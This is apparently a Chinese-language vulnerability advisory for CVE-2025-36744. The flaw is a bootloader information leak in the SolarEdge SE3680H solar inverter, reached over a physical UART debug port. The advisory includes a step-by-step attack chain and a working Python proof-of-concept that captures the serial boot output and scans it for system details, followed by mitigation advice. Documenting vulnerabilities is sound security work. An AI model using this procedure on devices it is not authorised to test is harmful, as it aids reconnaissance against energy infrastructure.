CVE-2025-36744 SolarEdge SE3680H引导程序敏感信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-36744

漏洞类型

信息泄露

CVSS评分

2.4 低危

攻击向量

物理 (AV:P)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SolarEdge SE3680H

漏洞概述

CVE-2025-36744是影响SolarEdge SE3680H太阳能逆变器的安全漏洞。该漏洞存在于设备的引导程序（bootloader）循环中，允许未认证的攻击者在物理接触设备的情况下获取敏感的系统信息。SolarEdge SE3680H是一款广泛应用于住宅和商业场景的太阳能逆变器，负责将太阳能电池板产生的直流电转换为交流电。在设备启动过程中，引导程序会重复初始化硬件组件并等待进一步的引导指令。在此期间，引导程序会通过串行端口或其他诊断接口输出详细的诊断信息。这些诊断输出包含有关设备操作系统的敏感细节，如内核版本、文件系统信息、硬件配置等。由于该漏洞不需要任何认证，攻击者只需物理接触到设备即可利用此漏洞获取敏感信息。这种信息泄露可能为攻击者提供有价值的情报，用于策划更复杂的攻击，例如识别设备上可能存在的其他漏洞或获取可用于持久性攻击的信息。尽管该漏洞的CVSS评分仅为2.4（低危），但对于安全要求较高的关键基础设施环境，这种信息泄露仍可能带来潜在风险。攻击者获取的系统信息可能帮助其了解设备的内部架构和运行状态，为后续攻击奠定基础。

技术细节

该漏洞的技术根源在于SolarEdge SE3680H设备的引导程序设计缺陷。在正常的设备启动流程中，引导程序负责初始化硬件组件、加载操作系统内核并完成系统启动。然而，该设备的引导程序包含一个循环机制，在设备反复初始化并等待进一步引导指令时，会通过诊断接口持续输出系统信息。攻击者可以通过物理接触设备，利用串行调试接口（如UART）连接到设备。在设备启动时，引导程序会输出包含以下敏感信息的诊断数据：1) 操作系统类型和版本信息；2) 文件系统结构和挂载点；3) 内核启动参数；4) 硬件组件配置详情；5) 内存布局信息。这些信息通过明文方式传输，未进行任何加密或访问控制。攻击者只需使用标准的串行通信工具（如USB转串口适配器）连接到设备的调试端口，即可捕获这些输出。由于设备在引导循环中会持续输出诊断信息，攻击者有充足的时间进行数据采集和解析。该漏洞的利用不需要任何凭证或特殊工具，降低了攻击门槛。获取的信息可用于识别设备固件版本对应的已知漏洞，或者为固件提取和逆向工程提供起点。

攻击链分析

STEP 1

步骤1

物理访问SolarEdge SE3680H设备，定位设备上的串行调试接口（通常位于电路板上，标记为TX、RX、GND）

STEP 2

步骤2

使用USB转串口适配器连接到设备的调试端口，设置正确的波特率（通常为115200）

STEP 3

步骤3

启动串行终端软件（如minicom、screen或PuTTY），连接到设备并观察启动输出

STEP 4

步骤4

在设备进入引导程序循环后，观察到诊断输出会持续循环输出系统信息，无需任何认证

STEP 5

步骤5

捕获并记录引导程序输出的所有诊断信息，包括操作系统版本、内核信息、文件系统详情等敏感数据

STEP 6

步骤6

利用获取的敏感信息进行进一步分析，识别设备固件版本对应的已知漏洞或进行固件提取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-36744 PoC - SolarEdge SE3680H Bootloader Information Disclosure
This PoC demonstrates how to capture sensitive information from the SolarEdge SE3680H bootloader.
Note: Physical access to the device is required.
"""

import serial
import time
import sys

def connect_to_device(port='/dev/ttyUSB0', baudrate=115200):
    """
    Connect to the SolarEdge device via serial debug port.
    Common ports: /dev/ttyUSB0, /dev/ttyUSB1, COM1, COM2
    """
    try:
        ser = serial.Serial(
            port=port,
            baudrate=baudrate,
            bytesize=serial.EIGHTBITS,
            parity=serial.PARITY_NONE,
            stopbits=serial.STOPBITS_ONE,
            timeout=10
        )
        return ser
    except serial.SerialException as e:
        print(f"[-] Failed to connect to {port}: {e}")
        return None

def capture_bootloader_output(ser, duration=30):
    """
    Capture bootloader diagnostic output for specified duration.
    The bootloader loop continuously outputs system information.
    """
    print(f"[*] Capturing bootloader output for {duration} seconds...")
    print("[*] Waiting for device initialization...\n")
    
    start_time = time.time()
    output_buffer = []
    
    while time.time() - start_time < duration:
        if ser.in_waiting > 0:
            try:
                data = ser.read(ser.in_waiting)
                decoded_data = data.decode('utf-8', errors='ignore')
                output_buffer.append(decoded_data)
                print(decoded_data, end='')
            except Exception as e:
                print(f"[-] Error reading data: {e}")
        time.sleep(0.1)
    
    return ''.join(output_buffer)

def analyze_captured_data(data):
    """
    Analyze captured data for sensitive information.
    Look for OS details, kernel info, filesystem data, etc.
    """
    sensitive_patterns = {
        'os_version': ['Linux', 'kernel', 'version', 'release'],
        'filesystem': ['ext', 'squashfs', 'ubi', 'jffs2', 'mount'],
        'hardware': ['CPU', 'memory', 'DDR', 'SOC', 'board'],
        'network': ['eth', 'wlan', 'IP', 'MAC', 'dhcp']
    }
    
    findings = {}
    for category, keywords in sensitive_patterns.items():
        matches = []
        for keyword in keywords:
            if keyword.lower() in data.lower():
                matches.append(keyword)
        if matches:
            findings[category] = matches
    
    return findings

def main():
    print("=" * 60)
    print("CVE-2025-36744 PoC - SolarEdge SE3680H")
    print("Information Disclosure via Bootloader Loop")
    print("=" * 60)
    
    port = sys.argv[1] if len(sys.argv) > 1 else '/dev/ttyUSB0'
    
    ser = connect_to_device(port)
    if not ser:
        sys.exit(1)
    
    print(f"[+] Connected to {port}")
    print("[+] Starting bootloader capture...\n")
    
    captured_data = capture_bootloader_output(ser, duration=30)
    
    print("\n" + "=" * 60)
    print("[*] Analyzing captured data...")
    
    findings = analyze_captured_data(captured_data)
    
    print("\n[+] Sensitive Information Found:")
    for category, matches in findings.items():
        print(f"  - {category}: {', '.join(matches)}")
    
    ser.close()
    print("\n[+] Capture complete. Serial connection closed.")

if __name__ == '__main__':
    main()

影响范围

SolarEdge SE3680H (所有已知版本均受影响)

防御指南

临时缓解措施

由于该漏洞需要物理接触设备才能利用，应优先采取物理安全措施：将设备部署在受控环境中，安装在锁定机柜或受保护区域；对调试端口进行物理禁用或密封；定期检查设备外壳完整性和端口状态。同时，监控设备的异常启动行为和串行通信活动，以便及时发现潜在的恶意访问尝试。在等待官方修复期间，应评估设备部署环境的安全性，确保只有授权人员能够物理接触到SolarEdge逆变器。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-36744
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-36744
3 Details https://www.cvedetails.com/cve/CVE-2025-36744/
4 VulDB https://vuldb.com/cve/CVE-2025-36744
5 Link https://csirt.divd.nl/CVE-2025-36744
6 Link https://csirt.divd.nl/DIVD-2025-00022/